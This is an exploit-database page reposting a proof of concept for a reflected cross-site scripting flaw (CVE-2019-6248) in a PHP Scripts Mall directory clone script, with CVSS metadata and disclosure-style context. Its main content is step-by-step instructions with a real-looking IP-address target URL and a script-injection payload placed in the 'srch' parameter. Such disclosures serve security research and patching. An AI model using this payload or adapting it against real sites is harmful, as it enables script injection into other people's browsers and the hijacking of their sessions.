Advertisement






PHP Scripts Mall Citysearch / Hotfrog / Gelbeseiten Clone Script 2.0.1 Reflected XSS

CVE Category Price Severity
CVE-2019-6248 CWE-79 Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Unknown 2019-01-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010133

Below is a copy:

PHP Scripts Mall Citysearch / Hotfrog / Gelbeseiten Clone Script 2.0.1 Reflected XSS
############################################################################################################ 
# Exploit Title: PHP Scripts Mall Citysearch / Hotfrog / Gelbeseiten Clone Script 2.0.1 Reflected XSS. 
# Date: 12.1.2019 
# Exploit Author: Sukanta Beniya 
# Vendor Homepage: https://www.phpscriptsmall.com/ 
# Software Link: https://www.phpscriptsmall.com/product/citysearch-hotfrog-gelbeseiten-clone-script/
# Category: Web Application 
# Version: 2.0.1
# Tested on: Windows 10
# Web: https://suku90.wordpress.com
# CVE: CVE-2019-6248
########################################################################################################### 

*Proof of Concept*

For Reflected XSS:
...................
1. First Goto XSS vulnerable Website "http://74.124.215.220/~jusdil/" 
2. Find url haveing " srch= "
3. example : http://74.124.215.220/~jusdil/restaurants-details.php?fid=10&srch=Baby%20Care
4. Edit search field with XSS script " http://74.124.215.220/~jusdil/restaurants-details.php?fid=10&srch="><script>alert("SUKANTA")</script> "
5. Than Hit Enter
6. You, Will, See The XSS popup "SUKANTA"

############################################################################################################

----------------------------------------------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum